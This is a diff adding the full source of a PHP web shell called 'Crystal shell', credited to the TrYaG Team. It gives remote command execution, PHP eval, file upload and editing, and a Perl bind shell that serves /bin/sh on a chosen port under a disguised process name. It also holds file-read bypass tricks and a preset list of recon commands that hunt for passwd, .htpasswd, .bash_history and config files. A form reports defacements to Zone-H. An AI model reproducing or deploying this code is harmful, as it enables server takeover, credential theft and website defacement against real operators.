+			<td style="font-size: 13px; font-family: verdana, arial, helvetica; color: red; background-color: #0000000">
+<?php
+// chr() //
+if(empty($_POST['Mohajer22'])){
+} else {
+$m=$_POST['Mohajer22'];
+$m=str_replace(" ","",$m);
+$m=str_replace("(","",$m);
+$m=str_replace(")","",$m);
+$m=str_replace(".",";",$m);
+$m=str_replace("chr","&#",$m);
+$m=str_replace(" ","",$m);
+echo $m ;
+}
+// ERORR //
+if(empty($_POST['ERORR'])){
+} else {
+$ERORR=$_POST['ERORR'];
+echo  error_log("
+<html>
+<head>
+<title> Exploit: error_log() By * Super-Crystal  * </title>
+<body bgcolor=\"#000000\">
+<table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
+<tr>
+<td><center><font size='6' color='#BBB516'> By  * Super-Crystal * TrYaG Team</font></center></td>
+</tr>
+</table>
+<font color='#FF0000'>
+</head>
+<?
+if(\$fileup == \"\"){
+ECHO \" reade for up \";
+}else{
+\$path= exec(\"pwd\");
+\$path .= \"/\$fileup_name\";
+\$CopyFile = copy(\$fileup,\"\$path\");
+if(\$CopyFile){
+echo \" up ok \";
+}else{
+echo \" no up \";
+}
+}
+if(empty(\$_POST['m'])){
+} else {
+\$m=\$_POST['m'];
+echo  system(\$m);
+}
+if(empty(\$_POST['cmd'])){
+} else {
+\$h=  \$_POST['cmd'];
+ print include(\$h) ;
+   }
+
+
+?>
+<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
+<input type='file' name='fileup' size='20'>
+<input type='submit' value='  up  '>
+</form>
+<form method='POST'  action='Super-Crystal.php'>
+<input type='cmd' name='cmd' size='20'>
+<input type='submit' value='  open (shill.txt) '>
+</form>
+<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
+<input type='text' name='m' size='20'>
+<input type='submit' value='  run  '>
+<input type='reset' value=' reset '>
+</form>
+", 3,$ERORR);
+}
+// id //
+if ($_POST['plugin'] ){
+
+
+                                  switch($_POST['plugin']){
+                                 case("cat /etc/passwd"):
+                                           for($uid=0;$uid<6000;$uid++){   //cat /etc/passwd
+                                        $ara = posix_getpwuid($uid);
+                                                if (!empty($ara)) {
+                                                  while (list ($key, $val) = each($ara)){
+                                                    print "$val:";
+                                                  }
+                                                  print "<br>";
+                                                }
+                                        }
+
+                                break;
+
+
+                                                }
+                                               }
+
+// imap //
+$string = !empty($_POST['string']) ? $_POST['string'] : 0;
+$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
+
+if ($string && $switch == "file") {
+$stream = imap_open($string, "", "");
+
+$str = imap_body($stream, 1);
+if (!empty($str))
+echo "<pre>".$str."</pre>";
+imap_close($stream);
+} elseif ($string && $switch == "dir") {
+$stream = imap_open("/etc/passwd", "", "");
+if ($stream == FALSE)
+die("Can't open imap stream");
+$string = explode("|",$string);
+if (count($string) > 1)
+$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
+else
+$dir_list = imap_list($stream, trim($string[0]), "*");
+echo "<pre>";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
+echo "</pre>";
+imap_close($stream);
+}
+// CURL //
+if(empty($_POST['curl'])){
+} else {
+$m=$_POST['curl'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+
+// copy//
+$u1p="";
+$tymczas="";
+if(empty($_POST['copy'])){
+} else {
+$u1p=$_POST['copy'];
+$temp=tempnam($tymczas, "cx");
+if(copy("compress.zlib://".$u1p, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+}
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+
+
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "&lt;" , $string);
+$string = str_replace(">" , "&gt;" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>saved -OK!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>eval code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">
+
+
+Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"..Exec..\"></form>";
+
+
+
+
+
+if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
+Including from here: "
+. ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}
+
+
+
+
+?>
+
+
+</td></tr></table></p></td></tr></table>
+	</a><br><hr size="1" noshade><p align="right">
+	<font face="Wingdings 3" size="5" color="#DCE7EF">&lt;</font><b><select name="act"><option value="ls">
+	With selected:</option><option value="delete">Delete</option><option value="archive">
+	Archive</option><option value="cut">Cut</option><option value="copy">Copy</option><option value="unselect">
+	Unselect</option></select>&nbsp;<input type="submit" value="Confirm"></p></form></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2" bgcolor="#000000"><p align="center">
+	<b>
+	:: </b>
+	<font face=Verdana size=-2><a href="?act=command">Executed command</a></font><b> ::</b></p></td></tr><tr><td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000; border: 1px solid #000000"><center><b>
+	<?
+	echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">";
+?>
+		<input type="submit" name="submit1" value="Command" style="border: 1px solid #000000"><font face="Wingdings 3" color="#DCE7EF" size="3">f</font></form><p>
+	&nbsp;</p>
+	</td>
+	<td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000"><center>
+	<form action="?act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="c:/appserv/www/shells/">
+		<font color="#DCE7EF">Select</font><font face="Wingdings 3" color="#DCE7EF" size="3">g</font><select name="cmd" size="1"><option value="ls -la">
+		-----------------------------------------------------------</option>
+		<option value="ls -la /var/lib/mysq">ls MySQL</option>
+		<option value="which curl">cURL ?</option>
+		<option value="which wget">Wget ?</option>
+		<option value="which lynx">Lynx ?</option>
+		<option value="which links">links ?</option>
+		<option value="which fetch">fetch ?</option>
+		<option value="which GET">GET ?</option>
+		<option value="which per">Perl ?</option>
+		<option value="gcc --help">C gcc Help ?</option>
+		<option value="tar --help">tar Help ?</option>
+		<option value="cat /etc/passwd">Get passwd !!!</option>
+		<option value="cat /etc/hosts">Get hosts</option>
+		<option value="perl --help">Perl Help ?</option>
+		<option value="find / -type f -perm -04000 -ls">
+		find all suid files</option><option value="find . -type f -perm -04000 -ls">
+		find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">
+		find all sgid files</option><option value="find . -type f -perm -02000 -ls">
+		find sgid files in current dir</option><option value="find / -type f -name config.inc.php">
+		find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">
+		find config* files</option><option value="find . -type f -name &quot;config*&quot;">
+		find config* files in current dir</option><option value="find / -perm -2 -ls">
+		find all writable directories and files</option><option value="find . -perm -2 -ls">
+		find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd">
+		find all service.pwd files</option><option value="find . -type f -name service.pwd">
+		find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">
+		find all .htpasswd files</option><option value="find . -type f -name .htpasswd">
+		find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">
+		find all .bash_history files</option><option value="find . -type f -name .bash_history">
+		find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">
+		find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">
+		find .fetchmailrc files in current dir</option><option value="lsattr -va">
+		list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">
+		show opened ports</option></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr></TABLE><a bookmark="minipanel" href="?act=bind"><font face="Verdana" size="-2">Bind port to</font><font face="Webdings" size="5" color="#DCE7EF">�</font></a><font color="#00FF00"><br>
+</font>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST">
+	<p align="center">
+<a bookmark="minipanel">
+	<b><font face="verdana" color="red" size="4">
+	<a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel">
+	<font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="2">Edit/Create
+	file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><font face="Wingdings 2" size="2">&quot;</font></p><p align="center">
+	&nbsp;<?
+if ($act == "edit") {echo "<center><b>������� ��������:<br><br> �� ���� ��� ����� ���� ���� ������ ���<br>���� ���� ����� ��� config.php ����<br>Edit<br>����� �� ����� ��� ������� ����� <br>����� � ��� ���� ����� ��� ��� �� ���� �� �������� <br>���� ���� ���� ������ washer-crystal.txt   </a>.</b>";}
+?>
+	</p>
+	<p>&nbsp;</p>
+	<p>	<?
+	echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+File to edit:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+?>
+	</p>
+	</form></center></p></td>
+ <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+                 <?
+if ($act == "upload") {echo "<center><b>��� �������:<br><br>�� ������ ����� ������ ���� <br>���� ���� �� ������ ��� ������ ������<br>UPLOAD< </a>.</b>";}
+?><a bookmark="minipanel"><b><font size="2">::
+	</font>
+	</b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="2">
+					upload</font></span></a><b><font size="2">::</font></b><font face=Webdings size=2>&#325;</font><font size="2"></a></a></font><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload">&nbsp;
+		<?
+		echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<INPUT type=\"file\" name=\"userfile\">
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Download\"></form></div>";
+?>
+	<p></form></p></td>
+
+</tr>
+</table>	<b>
+<font size=-2 face=verdana color="white">
+                  <p>&nbsp;<a href="?act=Defacer">Defacer Zone-H</a></font><p align="center">&nbsp;
+</p>
+ 					<?
+if ($act == "Defacer") {echo "<center><b>CRYSTAL-H:<br><br>��� ������ Defacer<br>������ ������� Victim<br>��� �������� �� ��� ������ ���� ��������� Attack Mode <br> ��� �������� Attack Reason <br>������ �������� sand   <br> ����� ��� ��������� ������� ������� Attacks On Hold</a>.</b>";}
+?>                 <p align="center"><font face="Verdana" color="#CC0000">
+                  <SCRIPT language=JavaScript type=text/javascript>
+        <!--
+        function validate(){
+            document.notifyForm.action = "http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/"
+            document.notifyForm.submit();
+        }
+        //-->
+        </SCRIPT>
+
+                  Defacer </font></font></font>
+<font face=Verdana color=#CC0000>
+					Zone-h</font><FORM name=notifyForm
+                  action=http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/
+                  method=post>
+                  <TABLE class=contentpane cellSpacing=0 cellPadding=0
+                  width="100%" border=0>
+                    <TBODY>
+                    <!-- DESCRIPTION -->
+                    <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                      <TD style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"></TD></TR><!-- INSTRUCTIONS -->
+                    </TBODY></TABLE>
+                  <TABLE cellSpacing=0 cellPadding=10 width="100%" border=0 style="color: #CC0000; border: 1px outset #000000; background-color: #000000">
+                    <TBODY>
+                    <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                      <TD align=left style="color: #DCE7EF; border: 1px solid #FFFFFF; background-color: #000000" bgcolor="#000000" bordercolorlight="#000000" bordercolordark="#000000">
+                        <TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
+                              align=left><SPAN
+                              style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY></TABLE><!-- Input Form --><TABLE class=notifyForm width="100%">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left width="15%"
+                              height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"><b><font size="1" color="#FF0000">
+							::Defacer::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">�</font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<INPUT
+                              class=inputbox id=defacer style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
+                              maxLength=64 name=defacer size="1" value="Super-Crystal"> </font></font>
+							</font></TD>
+							<font size=-2 face=verdana color=white>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b><font size="1" color="#FF0000">::Victim::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">�</font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<INPUT
+                              class=inputbox id=domain style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
+                              maxLength=250 value=http://www.microsoft.com name=domain size="1"> </TD>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b>
+							<font color="#FF0000" size="1">Attack Mode</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">�</font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<SELECT class=inputbox
+                              style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=method size="1"> <OPTION
+                                value="" selected>choose</OPTION> <OPTION
+                                value=23>Access credentials through Man In the
+							Middle attack</OPTION><OPTION value=22>Attack
+							against the administrator/user (password
+							stealing/sniffing)</OPTION><OPTION value=29>DNS
+							attack through cache poisoning</OPTION><OPTION
+                                value=28>DNS attack through social engineering</OPTION><OPTION value=17>
+							File Inclusion</OPTION><OPTION value=9>FTP Server
+							intrusion</OPTION><OPTION value=8>Mail Server
+							intrusion</OPTION><OPTION value=30>Not available</OPTION><OPTION value=14>
+							Other Server intrusion</OPTION><OPTION value=18>
+							Other Web Application bug</OPTION><OPTION value=19>
+							Remote administrative panel access through
+							bruteforcing</OPTION><OPTION value=20>Remote
+							administrative panel access through password
+							guessing</OPTION><OPTION value=21>Remote
+							administrative panel access through social
+							engineering</OPTION><OPTION value=25>Remote service
+							password bruteforce</OPTION><OPTION
+                                value=24>Remote service password guessing</OPTION><OPTION value=26>
+							Rerouting after attacking the Firewall</OPTION><OPTION
+                                value=27>Rerouting after attacking the Router</OPTION><OPTION value=12>
+							RPC Server intrusion</OPTION><OPTION value=13>Shares
+							misconfiguration</OPTION><OPTION value=15>SQL
+							Injection</OPTION><OPTION value=10>SSH Server
+							intrusion</OPTION><OPTION value=11>Telnet Server
+							intrusion</OPTION><OPTION value=16>URL Poisoning</OPTION><OPTION value=7>
+							Web Server external module intrusion</OPTION><OPTION
+                                value=6>Web Server intrusion</OPTION></SELECT></TD></TR><TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b>
+							<font size="1" color="#FF0000">Attack Reason</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">�</font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<SELECT class=inputbox
+                              style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=reason size="1"> <OPTION
+                                value="" selected>choose</OPTION> <OPTION
+                                value=4>As a challenge</OPTION><OPTION
+                                value=1>Heh...just for fun!</OPTION><OPTION
+                                value=5>I just want to be the best defacer</OPTION><OPTION value=7>
+							Not available</OPTION><OPTION
+                                value=6>Patriotism</OPTION><OPTION
+                                value=3>Political reasons</OPTION><OPTION
+                                value=2>Revenge against that website</OPTION></SELECT></TD></TR></TBODY></TABLE><TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
+                              align=left><SPAN
+                              style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY></TABLE><DIV style="CLEAR: both"></DIV>
+                        <TABLE class=notifyForm width="100%">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD align=left style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa" bgcolor="#000000">
+							<INPUT class=button onclick=validate() type=button value=Send name=send style="color: #CC0000; border: 1px solid #C0C0C0; background-color: #EEEEEE">&nbsp;&nbsp;<b><font size=4 face="Wingdings 3">:</font></b>&nbsp;&nbsp;
+							</font></font>
+<font size=6 face=Webdings color="#FF0000">L </font><b>
+							<a class="sublevel" href="http://www.zone-h.org/component/option,com_attacks/Itemid,45/">
+							<font color="#FF0000">Attacks On Hold</font></a></b><font color="#FF0000">
+							</font>
+<font size=6 face=Webdings color="#FF0000">L</TD></TR></TBODY></TABLE><INPUT type=hidden
+                        value=com_notify name=option style="font-family: Verdana; font-size: 10px; color: black; border: 2px solid black; background-color: #C0C0C0"></TR></TBODY></TABLE></FORM></font></b><br>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+	<td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+	<b>
+	&nbsp;</b><font face="Wingdings 3" size="5">y</font><b>Crystal shell v. 1 beta&nbsp; </b><font color="#CC0000"><b>�oded by</b> </font><b><a href="http://www.tryag.com">TrYaG Team</a> <span lang="en-us">l</span></b> <b><a href="?act=team">Arab Security Center Team</a> |<a href="http://www.secure4center.com"><font color="#DCE7EF">securityCenter</font></a>|
+	: Web </b><font face="Wingdings 3" size="5">x</font></p><p align="center">&nbsp;</p></td></tr></table>
+
+</a>
+
+
+<div align="right">
+
+<span lang="en-us">&nbsp; </span><TABLE cellSpacing=0 cellPadding=0 border=0>
+  <TBODY>
+  <TR>
+    <TD align=middle style="font-family: verdana, arial, 'ms sans serif', sans-serif; font-size: 11px; color: #D5ECF9">
+      <TABLE class=calendar_table cellSpacing=1 cellPadding=1>
+        <TBODY>
+        <TR>
+          <TD class=calendar_month colSpan=7><span lang="en-us">CRYSTAL-<font color="#CC0000">H</font></span><font color="#CC0000">
+			2006</font></TD></TR><TR>
+          <TD class=calendar_days>P</TD><TD class=calendar_days>P</TD><TD class=calendar_days>S</TD><TD class=calendar_days>C</TD><TD class=calendar_days>P</TD><TD class=calendar_days>C</TD><TD class=calendar_days>C</TD></TR><TR>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD></TR>
+        <TR>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day>1 </TD></TR>
+        <TR>
+          <TD class=calendar_day>2 </TD>
+          <TD class=calendar_day>3 </TD>
+          <TD class=calendar_day><font color="#FF0000">4 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">5 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">6 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">7 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">8 </font> </TD></TR>
+        <TR>
+          <TD class=calendar_day>9 </TD>
+          <TD class=calendar_day><font color="#FF0000">10 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">11 </font> </TD>
